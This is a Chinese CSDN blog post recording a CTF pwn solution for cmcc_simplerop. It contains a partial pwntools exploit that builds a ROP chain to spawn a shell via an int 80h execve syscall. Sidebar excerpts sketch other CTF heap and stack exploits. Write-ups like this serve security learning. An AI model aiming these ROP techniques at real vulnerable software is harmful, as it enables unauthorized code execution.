20.5.23pwn做题记录

最新推荐文章于 2021-12-23 03:15:45 发布
最新推荐文章于 2021-12-23 03:15:45 发布
阅读量173 收藏
点赞数
分类专栏: Pwn 学习经历
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eeeeeight/article/details/106319681
版权
本文记录了在CMCC_SimplerOP挑战中遇到的问题及解决方案,涉及自定义puts函数、使用int 80h调用系统函数以及构造ROP链。在win2函数中,通过理解运算符优先级解决了参数问题。最后提到了picoctf的两个缓冲区溢出题目,分别是基本的栈溢出和类似ROP链的解题方法。
摘要由CSDN通过智能技术生成

cmcc_simplerop
一开始以为是用里面定义的"puts函数"打印函数地址做的,然后失败了:LibcSearcher找不到匹配的libc,猜测可能是因为他的"puts"函数是自定义的(因为没有在plt表中),所以打印出的地址不正确?
既然不能像以前一样使用system函数,那就再试一下int 80h结果真有函数在这里插入图片描述
然后就是编写exp了

from pwn import *
from LibcSearcher import LibcSearcher
#sh=process('./sim')
sh=remote('node3.buuoj.cn',26536)
elf=ELF('./sim')

context.log_level='debug'
 
#puts_addr=0x804F640这里是一开始想通过strcmp的地址找libc的但不知道为什么失败了
#cmsp_got=0x80EA034
main_addr=0x8048E24
pop_di=0x804846f
read_addr=0x806CD50
data=0x80e9000
pop3_addr=0x0804838c
pop_ax=0x080bae06
pop_dx_cx_bx=0x0806e850

payload1='a'*32+p32(read_addr)+p32(pop3_addr)+p32(0)+p32(data)+p32(8)+p32(pop_ax)+p32(0xb)+p32(pop_dx_cx_bx)+p32(0)+p32(0)+p32(data)+p32(0x080493e1)

payload2
最低0.47元/天 解锁文章
北岛静石
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn(无system函数下的栈溢出漏洞利用 | 【puts函数】
weixin_43742794的博客
08-09 3345
pwn100及exp 首先用checksec看一下权限的情况 扔进ida64发现是一个栈溢出漏洞,但是并没有system函数和/bin/sh可以使用 这里需要用到一个DynELF类 具体细节可以参见这篇文章 https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&highlight=pwn 核心思路是通过DynELF泄...
攻防世界PWNshell题解
seaaseesa的博客
11-22 1434
shell 首先,检查一下程序的保护机制 然后,我们用IDA分析 存在栈溢出漏洞 我们先运行程序,发现可以直接输命令 然而,其他命令都不可用,需要登录成功才能用 我们看看登录的逻辑 程序从creds.txt文件中一行一行的读取,取第一个冒号后面的内容为用户名,取第二个冒号后面的内容为密码 只要我们输入的用户名和密码存在于那个文件,就登录成功,然后就能执行shel...
20.5.26pwn做题记录
eeeeeight的博客
05-27 238
others_babystack 之前做过差不多的,只不过是改got表的,但是64位好久不做了,忘了好多 题目开启了canary保护 先看一下源码: 明显看到case1存在栈溢出漏洞,然后case2存在打印函数可以把canary打印出来,再在case3退出一下,利用一下漏洞就可以了 (注:我之前忘记了64位传参要用寄存器di,si,dx,cx,r8,r9的顺序) exp: from pwn import * from LibcSearcher import LibcSearcher #sh=process
2021羊城杯pwn部分wp
eeeeeight的博客
09-12 6502
前言: 羊城杯的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
2021长城杯pwn部分wp
eeeeeight的博客
09-19 6027
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
2021鹤城杯pwn部分wp
eeeeeight的博客
10-09 2088
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
Nov 26, 21在macOS 12.0.1上布置pwn环境
eeeeeight的博客
11-27 1766
前言: 不是让民那桑在mac上做amd架构的题目,我布置环境是为了以后方便pwn arm架构的题目/设备之类的(逃) Pwn environment: lldb && voltron && tmuxinator && pwntools: Because outstanding performance of Plugins in gdb like pwndbg, gef and so on. I choose to install gdb on my M1 Ma
2021东华杯pwn部分wp
eeeeeight的博客
11-01 1596
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
2021绿城杯pwn部分wp
eeeeeight的博客
09-29 1170
前言: 这次比赛了解到了还有jspwn这玩意, 然后没时间学(, 十月一定(逃) uafpwn: 释放之后指针未置零, 所以use after free乱打 from pwn import * context(log_level = 'debug', arch = 'amd64') # sh = process('./uaf_pwn') sh = remote('82.157.5.28', 52102) elf = ELF('./uaf_pwn') libc = elf.libc def add(siz
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1166
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
21 08 08学习总结
eeeeeight的博客
08-10 1129
21.08.08学习总结 Tags: learning experience 不知道什么时间-不知道什么时间: BUU刷题 re找门: xor: 一个数xor同一个数两次之后仍然是其本身 reverse3: 一个base64的加密, 主函数里有个+i的操作, 把+i消去之后base64解密就行了, 但是因为是萌新第一次接触re的base64, 于是就自己写了个base64的加密与解密练手(ida的ctrl e是直接选取字符串) helloword: jeb打开, 就能直接找到了 SimpleRev: 前面有
Embedded Security CTF-2
eeeeeight的博客
12-23 1095
先挖个坑,还有三道就刷完了
操作系统真象-MBR
eeeeeight的博客
09-13 1044
操作系统真象-MBR Column: September 5, 2021 Tags: learning experience, 操作系统 磁盘创建: 两种创建光秃秃系统盘的方法: qemu: qemu-img create -f qcow2 -b hd60M.img -size 60M bochs: bximage -hd -mode="flat" size=60 -q hd60M.img 磁盘启动: 启动方式:(bochs生成的可以在qemu使用. 但qemu生成的好像不能在bochs使用, 至少在我
操作系统真象-开启分页&加载内核
eeeeeight的博客
10-03 1033
操作系统真象-开启分页&加载内核 Tags: learning experience, 操作系统 开启分页: ps. 下面的内容都是基于二级页表的, 毕竟大伙都是用的二级页表, 而且动态规划的二级页表空间利用率高于一级页表哇 为什么要开启分页: 最大化利用物理内存, 避免物理内存啥的, 以及加速内外存交换?(毕竟书上方案B在面对需要大空间进程时, 对内外存交换速度的打击是毁灭性的) 如何开启分页机制: ps. 这三个步骤是有顺序的 准备好页目录及页表 将页表目录的地址写入cr3 cr0的PG位置零
操作系统真象-保护模式
eeeeeight的博客
09-15 1009
操作系统真象-保护模式 Column: September 12, 2021 Tags: learning experience, 操作系统 一点写汇编的新知识: 可以在代码中用[bits xx]来指定生成xx位的shellcode, 如果在接触到下一个[bits xx]之前出现了不符合当前位数的内存/寄存器操作, 则会在机器码之前添加0x66(反转操作数大小前缀)和0x67(反转寻址方式签字), 然后汇编如何在机器码方面体现操作数的位数不同就交给硬件吧! 如何进入保护模式: 打开A20地址线 加载gdt
Embedded Security CTF-1
eeeeeight的博客
12-22 1002
Embedded Security CTF (1) Tutorial 有几个不同的指令; reset:重启cpu break:地址不加* unbreak:取消断点 let: gdb下的set solve: 发送解决问题的请求 payload: 70617373776f7264 New Orleans 内存里直接就能找到了, 但发现好像还有个gets的栈溢出, 预期解payload: 7c30544d492f5a Sydney 第一次遇到了大端法诶, payload: 7936602430334f66 Han
羊城杯和天翼杯的补充
eeeeeight的博客
09-30 980
YCB2021-how2heap: 当数组被填满的时候, 再进行删除会出现相同相同指针, 导致uaf 同时也存在数组负索引未检测的问题, 因此got表等也是可以被free的 后面就是修改got表, 使得指向onegadget的地址就行了 (这题当时没做出来主要是因为没发现uaf, 而且在本地仅靠负索引就可以做出来了, 但是在远程由于全局变量的改变, 导致负索引free等操作受限, 所以打不出来, 而且记录的这种做法很巧妙, 反正让我现在做也不一定做得出来, 记录下来主要是为了告诉自己got表可以尝试写入on
21 08 10学习总结
eeeeeight的博客
08-11 947
21.08.10学习总结 Column: August 10, 2021 Tags: learning experience 不知道什么时间-不知道什么时间: buu刷题 Re: 不一样的flag: 迷宫题の初体验, 一开始IDA的分析不对导致分析题目分析不出来, 就问了一下学长如何修改IDA的stack显示(先edit-undefined, 再右击选择array啥的或者按D表示define啥的), 而后就是分析迷宫, 由于这个字符串被默认认为是在末尾加上\x00了, 所以才被识别为char[26], 实际
Recho.doc pwn题:栈溢出与shutdown漏洞利用
在"攻防世界pwn题:Recho.doc"这份文档中,讨论了一个针对64位二进制文件的逆向工程和漏洞利用挑战。该文件没有启用canary和PIE保护机制,提供了丰富的学习材料。以下是关键知识点的详细解析: 1. **文件与环境分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值